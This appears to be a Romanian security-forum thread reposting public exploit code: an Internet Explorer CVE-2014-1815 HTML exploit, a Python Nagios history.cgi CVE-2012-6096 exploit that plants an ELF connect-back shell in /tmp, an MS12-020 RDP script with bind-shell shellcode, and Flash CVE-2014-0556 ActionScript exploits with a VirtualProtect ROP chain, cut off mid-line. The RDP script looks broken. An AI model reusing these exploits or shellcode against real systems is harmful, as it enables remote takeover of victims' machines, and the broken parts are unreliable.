Nytro

Vreau sa vad 20-30 de lucruri pe care le donati inainte de a va da cu parerea.

Vineri e Owasp. Ne vedem acolo.

Sunt cateva chestii utile, dar nu e cine stie ce. Forumuri interesante mai sunt: opensc, trojanforge, rohitab, tuts4you, kernelmode si multe altele. Si reversing.ro al lui @giv .

CCleaner Pro Patching Tut by Kjacky Home Page: http://www.piriform.com/ Tutorial: CCP Sursa: EXETOOLS FORUM

CVE-2014-1815 Html code - Internet Explorer 6-11 CVE-2014-1815 Html code 1: < !doctype html> 2: < html> 3: < head> 4: < meta http-equiv="Cache-Control" content="no-cache"/> 5: < sc?ript > 6: func?tion stc() 7: { 8: var Then = new Date(); 9: Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 ); 10: document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString(); 11: } 12: func?tion cid() 13: { 14: var swf = 0; 15: try { 16: swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) { 17: } 18: if (!swf) 19: return 0; 20: var cookieString = new String(document.cookie); 21: if(cookieString.indexOf("d93kaj3Nja3") == -1) 22: {stc(); return 1;}else{ return 0;} 23: } 24: String.prototype.repeat=func?tion (i){return new Array(isNaN(i)?1:++i).join(this);} 25: var tpx=un?escape ("%u1414%u1414").repeat(0x60/4-1); 26: var ll=new Array(); 27: for (i=0;i< 3333;i++)ll.push(document.create?Element("img")); 28: for(i=0;i< 3333;i++) ll[i].className=tpx; 29: for(i=0;i< 3333;i++) ll[i].className=""; 30: CollectGarbage(); 31: func?tion b2() 32: { 33: try{xdd.re?placeNode(document.createTextNode(" "));}catch(exception){} 34: try{xdd.outerText='';}catch(exception){} 35: CollectGarbage(); 36: for(i=0;i< 3333;i++) ll[i].className=tpx; 37: } 38: func?tion a1(){ 39: if (!cid()) 40: return; 41: document.body.contentEditable="true"; 42: try{xdd.applyElement(document.create?Element("frameset"));}catch(exception){} 43: try{document.selection.createRange().select();}catch(exception){} 44: } 45: < / sc?ript > 46: < /head> 47: < body onload='setTimeout("a1();",2000);' onresize=b2()> 48: < marquee id=xdd > < /marquee> 49: < object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE"> 50: < param name="movie" value="storm.swf" /> 51: < param name="quality" value="high" /> 52: < param name="bgcolor" value="#ffffff" /> 53: < param name="allowScriptAccess" value="sameDomain" /> 54: < param name="allowFullScreen" value="true" /> 55: < /object> 56: < /body> 57: < body> 58: < form name=loading> 59: ¡¡< p align=center> < font color="#0066ff" size="2"> Loading....,Please Wait< /font> < font color="#0066ff" size="2" face="verdana"> ...< /font> 60: ¡¡¡¡< input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;"> 61: ¡¡¡¡ 62: ¡¡¡¡< input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;"> 63: ¡¡¡¡< sc?ript > ¡¡ 64: var bar=0¡¡ 65: var line="||"¡¡ 66: var amount="||"¡¡ 67: count()¡¡ 68: func?tion count(){¡¡ 69: bar=bar+2¡¡ 70: amount =amount + line¡¡ 71: document.loading.chart.value=amount¡¡ 72: document.loading.percent.value=bar+"%"¡¡ 73: if (bar< 99)¡¡ 74: {setTimeout("count()",500);}¡¡ 75: else¡¡ 76: {window.location = "http://www.google.com.hk";}¡¡ 77: }< / sc?ript > 78: ¡¡< /p> 79: < /form> 80: < p align="center"> Wart,< a style="text-decoration: none" href="http://www.google.com.hk"> < font color="#FF0000"> kick me< /font> < /a> .< /p> 81: < /body> 82: < /html> Sursa: CVE-2014-1815 Html code - Pastebin.com

CVE-2012-6096 - Nagios history.cgi Remote Command Execution #!/usr/bin/python # # CVE-2012-6096 - Nagios history.cgi Remote Command Execution # =========================================================== # Another year, another reincarnation of classic and trivial # bugs to exploit. This time we attack Nagios.. or more # specifically, one of its CGI scripts. [1] # # The Nagios code is an amazing monster. It reminds me a # lot of some of my early experiments in C, back when I # still had no clue what I was doing. (Ok, fair enough, # I still don't, heheh.) # # Ok, I'll come clean. This exploit doesn't exactly # defeat FORTIFY. This approach is likely to work just FINE # on other crippled distro's though, think of stuff like # ArchLinux, Slackware, and all those Gentoo kids twiddling # their CFLAGS. [2] (Oh and hey, BSD and stuff!) # # I do some very stupid shit(tm) here that might make an # exploit coder or two cringe. My sincere apologies for that. # # Cold beer goes out to my friends who are still practicing # this dying but interesting type of art: # # * brainsmoke * masc * iZsh * skier_ * steve * # # -- blasty <blasty@fail0verflow.com> / 2013-01-08 # # References: # [1] http://permalink.gmane.org/gmane.comp.security.oss.general/9109 # [2] http://www.funroll-loops.info/ # # P.S. To the clown who rebranded my Samba exploit: j00 s0 1337 m4n! # Next time you rebrand an exploit at least show some diligence and # add some additional targets or improvements, so we can all profit! # # P.P.S. hey, Im not _burning_ bugs .. this is a 2day, enjoy! # import os, sys, socket, struct, urllib, threading, SocketServer, time from base64 import b64encode SocketServer.TCPServer.allow_reuse_address = True targets = [ { "name" : "Debian (nagios3_3.0.6-4~lenny2_i386.deb)", "smash_len" : 0xc37, "unescape" : 0x0804b620, "popret" : 0x08048fe4, "hostbuf" : 0x080727a0, "system_plt" : 0x08048c7c } ] def u32h(v): return struct.pack("<L", v).encode('hex') def u32(v, hex = False): return struct.pack("<L", v) # Tiny ELF stub based on: # http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html def make_elf(sc): elf_head = \ "7f454c46010101000000000000000000" + \ "02000300010000005480040834000000" + \ "00000000000000003400200001000000" + \ "00000000010000000000000000800408" + \ "00800408" + u32h(0x54+len(sc))*2 + \ "0500000000100000" return elf_head.decode("hex") + sc # interactive connectback listener class connectback_shell(SocketServer.BaseRequestHandler): def handle(self): print "\n[!!] K4P0W!@# -> shell from %s" % self.client_address[0] print "[**] This shell is powered by insane amounts of illegal substances" s = self.request import termios, tty, select, os old_settings = termios.tcgetattr(0) try: tty.setcbreak(0) c = True os.write(s.fileno(), "id\nuname -a\n") while c: for i in select.select([0, s.fileno()], [], [], 0)[0]: c = os.read(i, 1024) if c: if i == 0: os.write(1, c) os.write(s.fileno() if i == 0 else 1, c) except KeyboardInterrupt: pass finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings) return class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass if len(sys.argv) != 5: print "\n >> Nagios 3.x CGI remote code execution by <blasty@fail0verflow.com>" print " >> \"Jetzt geht's Nagi-los!\"\n" print " usage: %s <base_uri> <myip> <myport> <target>\n" % (sys.argv[0]) print " targets:" i = 0 for target in targets: print " %02d) %s" % (i, target['name']) i = i+1 print "" sys.exit(-1) target_no = int(sys.argv[4]) if target_no < 0 or target_no > len(targets): print "Invalid target specified" sys.exit(-1) target = targets[ int(sys.argv[4]) ] # comment this shit if you want to setup your own listener server = ThreadedTCPServer((sys.argv[2], int(sys.argv[3])), connectback_shell) server_thread = threading.Thread(target=server.serve_forever) server_thread.daemon = True server_thread.start() # shellcode to be executed # vanilla x86/linux connectback written by a dutch gentleman # close to a decade ago. cback = \ "31c031db31c951b10651b10151b10251" + \ "89e1b301b066cd8089c231c031c95151" + \ "68badc0ded6668b0efb102665189e7b3" + \ "1053575289e1b303b066cd8031c939c1" + \ "740631c0b001cd8031c0b03f89d3cd80" + \ "31c0b03f89d3b101cd8031c0b03f89d3" + \ "b102cd8031c031d250686e2f7368682f" + \ "2f626989e3505389e1b00bcd8031c0b0" + \ "01cd80" cback = cback.replace("badc0ded", socket.inet_aton(sys.argv[2]).encode("hex")) cback = cback.replace("b0ef", struct.pack(">H", int(sys.argv[3])).encode("hex")) # Eww.. so there's some characters that dont survive the trip.. # yes, even with the unescape() call in our return-chain.. # initially I was going to use some /dev/tcp based connectback.. # but /dev/tcp isn't available/accesible everywhere, so instead # we drop an ELF into /tmp and execute that. The '>' characters # also doesn't survive the trip so we work around this by using # the tee(1) utility. # If your target has a /tmp that is mounted with noexec flag, # is severely firewalled or guarded by trained (watch)dogs.. # you might want to reconsider this approach! cmd = \ "rm -rf /tmp/x;" + \ "echo " + b64encode(make_elf(cback.decode('hex'))) + "|" + \ "base64 -d|tee /tmp/x|chmod +x /tmp/x;/tmp/x;" # Spaces (0x20) are also a problem, they always ends up as '+' # so apply some olde trick and rely on $IFS for argv separation cmd = cmd.replace(" ", "${IFS}") # Basic return-2-whatever/ROP chain. # We return into cgi_input_unescape() to get rid of # URL escaping in a static buffer we control, and then # we return into system@plt for the moneyshot. # # Ergo sum: # There's no memoryleak or whatever needed to leak libc # base and bypass ASLR.. This entire Nagios PoS is stringed # together by system() calls, so pretty much every single one # of their little silly binaries comes with a PLT entry for # system(), huzzah! rop = [ u32(target['unescape']), u32(target['popret']), u32(target['hostbuf']), u32(target['system_plt']), u32(0xdeafbabe), u32(target['hostbuf']) ] # Yes.. urllib, so it supports HTTPS, basic-auth and whatnot # out of the box. Building HTTP requests from scratch is so 90ies.. params = urllib.urlencode({ 'host' : cmd + "A"*(target['smash_len']-len(cmd)) + "".join(rop) }) print "[>>] CL1Q .." f = urllib.urlopen(sys.argv[1]+"/cgi-bin/history.cgi?%s" % params) print "[>>] CL4Q .." f.read() # TRIAL PERIOD ACTIVE, LOL! time.sleep(0x666) server.shutdown() Sursa: [Python] CVE-2012-6096 exploit - Pastebin.com

CVE-2012-0002 - Remote Desktop Protocol (RDP) #!/usr/bin/env python ############################################################################# # MS12-020 Exploit by Sabu # sabu@fbi.gov # Uses FreeRDP ############################################################################# import struct import sys from freerdp import rdpRdp from freerdp import crypto from freerdp.rdpRdp import rdpNego #bind shellcode TCP port 4444 shellcode = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90' shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9' shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56' shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22' shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30' shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81' shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42' shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22' shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9' shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79' shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab' shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa' shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48' shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1' shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0' shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe' shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9' shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84' shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56' shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8' shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79' shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6' shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9' #Payload payload = '\x41\x00\x5c\x00' payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49' payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68' payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32' payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43' payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71' payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c' payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74' payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66' payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c' payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b' payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79' payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54' payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36' payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30' payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66' payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73' payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b' payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63' payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a' payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f' payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73' payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c' payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70' payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61' payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33' payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32' payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e' payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39' payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39' payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e' payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e' payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51' payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64' payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37' payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70' payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e' payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73' payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61' payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78' payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e' payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30' payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b' payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b' payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68'; class SRVSVC_Exploit(Thread): def __init__(self, target, port=3389): super(SRVSVC_Exploit, self).__init__() self.__port = port self.target = target def __DCEPacket(self): print '[-]Connecting' self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target) self.__trans.connect() print '[-]connected' % self.target # Making teh packet self.__stub='\x01\x00\x00\x00' self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00' self.__stub+=shellcode self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x00\x00\x00\x00' self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00' self.__stub+=payload self.__stub+='\x00\x00\x00\x00' self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00' self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00' self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00' self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3' return def run(self): self.__DCEPacket() self.__dce.call(0x1f, self.__stub) print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.' if __name__ == '__main__': target = sys.argv[1] print '\nUsage: %s <target ip> \n' % sys.argv[0] sys.exit(-1) current = SRVSVC_Exploit(target) current.start() Nota: Syntax highlight asta jegos pune de-am-pulea niste spatii. Luati de la sursa. Sursa: [Python] CVE-2012-0002 - Pastebin.com

[h=1]CVE-2014-0556[/h]By: hdarwin on Sep 27th, 2014 (edited) By: [URL="http://pastebin.com/u/hdarwin"]hdarwin[/URL] on Sep 27th, 2014 (edited) [LIST=1]/* <html> <head> <title>CVE-2014-0556</title> </head> <body> <object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br> <button onclick="swf.exploit()">STOP</button> </body> </html> */ /* First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0908a008 ebx=02ffa6a0 ecx=0b51f020 edx=4141411c esi=06a62020 edi=06a62020 eip=4141411c esp=02ffa5e4 ebp=02ffa610 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 4141411c ?? ??? */ package { import flash.events.* import flash.media.* import flash.display.* import flash.geom.* import flash.utils.* import flash.text.* import flash.system.Capabilities; import flash.external.ExternalInterface public class Main extends Sprite { private var i0:uint private var i1:uint private var i2:uint private var i3:uint private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & " + Capabilities.version) private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200) private var ob:Vector.<Object> = new Vector.<Object>(6400) private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff) private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4) private var snd:Sound private var vector:uint public function Main():void { for (i0 = 0; i0 < 3200; i0++) { ba[i0] = new ByteArray() ba[i0].length = 0x2000 ba[i0].position = 0xfffff000 } for (i0 = 0; i0 < 3200; i0++) { if (i0 % 2 == 0) ba[i0] = null ob[i0 * 2] = new Vector.<uint>(1008) ob[i0 * 2 + 1] = new Vector.<uint>(1008) } bitmap.copyPixelsToByteArray(rect, ba[1601]) for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break ob[i0][1024 * 3 - 2] = 0xffffffff for (i1 = 0; ; i1++) { if (i0 == i1) continue if (ob[i1].length != 1008) break } ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1] ob[i0].fixed = true for (i2 = 1000; ; i2++) { if ( ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15] ) { vector = ob[i1][0xFFFFFFFF - i2 + 11] str += "\n\nVector<uint> Address : " + vector.toString(16) break }else if ( ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15] ) { vector = ob[i1][i2 + 11] str += "\n\nVector<uint> Address : " + vector.toString(16) break } } snd = new Sound() for (i2 = 0; i2 < 6400; i2++) { if (i2 == i0 || i2 == i1) continue ob[i2] = null ob[i2] = new Vector.<Object>(1014) ob[i2][0] = snd ob[i2][1] = snd } for (i2 = 0; ; i2++) { if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) { str += "\n\nDump Vector<Object>" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(ob[i0][i2 + i3 - 9].toString(16), 8) + "\t" } str += "\n\nDump Sound Object" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t" } str += "\n\nDump Sound Object V-Table" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t" } str += "\n\n*** V-Table Modify ***" write(ob[i0][i2 + 1] - 1, vector + 8) for (i3 = 0; i3 < 1008; i3++) { ob[i0][i3] = 0x41414100 | i3 } str += "\n\nDump Sound Object" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t" } str += "\n\nDump Sound Object V-Table" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t" } break } } ob[i1][0xFFFFFFFE - 1024 * 3] = 4096 ob[i0][1024 * 3 - 2] = 0 var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf) if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit) } private function write(addr:uint, data:uint):void { ob[i0][(addr - vector) / 4 - 2] = data } private function read(addr:uint):uint { return ob[i0][(addr - vector) / 4 - 2] } private function zeroPad(number:String, width:int):String { if (number.length < width) return "0" + zeroPad(number, width-1) return number } public function exploit():void { snd.toString() } } } ============================================================================================================================= /* <html> <head> <title>CVE-2014-0556</title> </head> <body> <object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br> <button onclick="swf.exploit()">STOP</button> </body> </html> */ /* (1728.eb0): Break instruction exception - code 80000003 (first chance) eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d63048 cc int 3 1:020> dd esp l4 08d63048 cccccccc cccccccc cccccccc cccccccc 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d63049 cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304a cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304b cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304c cc int 3 */ package { import flash.events.* import flash.media.* import flash.display.* import flash.geom.* import flash.utils.* import flash.text.* import flash.external.ExternalInterface public class Main extends Sprite { private var i0:uint private var i1:uint private var i2:uint private var i3:uint private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145") private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200) private var ob:Vector.<Object> = new Vector.<Object>(6400) private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff) private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4) private var snd:Sound private var vector:uint private var vtable:uint private var flash:uint public function Main():void { for (i0 = 0; i0 < 3200; i0++) { ba[i0] = new ByteArray() ba[i0].length = 0x2000 ba[i0].position = 0xfffff000 } for (i0 = 0; i0 < 3200; i0++) { if (i0 % 2 == 0) ba[i0] = null ob[i0 * 2] = new Vector.<uint>(1008) ob[i0 * 2 + 1] = new Vector.<uint>(1008) } bitmap.copyPixelsToByteArray(rect, ba[1601]) for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break ob[i0][1024 * 3 - 2] = 0xffffffff for (i1 = 0; ; i1++) { if (i0 == i1) continue if (ob[i1].length != 1008) break } ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1] ob[i0].fixed = true for (i2 = 1000; ; i2++) { if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) { vector = ob[i1][0xFFFFFFFF - i2 + 11] break } else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) { vector = ob[i1][i2 + 11] break } } snd = new Sound() for (i2 = 0; i2 < 6400; i2++) { if (i2 == i0 || i2 == i1) continue ob[i2] = null ob[i2] = new Vector.<Object>(1014) ob[i2][0] = snd ob[i2][1] = snd } for (i2 = 0; ; i2++) { if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) { vtable = read(ob[i0][i2 + 1] - 1) flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx write(ob[i0][i2 + 1] - 1, vector + 0xf54) for (i3 = 0; i3 < 1008; i3++) { ob[i0][i3] = 0x41414100 | i3 } ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN ob[i0][3] = 0x00000201 // 0x00000201 ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN ob[i0][5] = 0x00000040 // 0x00000040 ob[i0][6] = flash + 0x00691119 // POP ECX # RETN ob[i0][7] = vector + 2000 // Writable location ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP) ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN ob[i0][11] = flash + 0x0000d83f // JMP [EAX] ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect() ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp' ob[i0][16] = 0xcccccccc // shellcode ob[i0][17] = 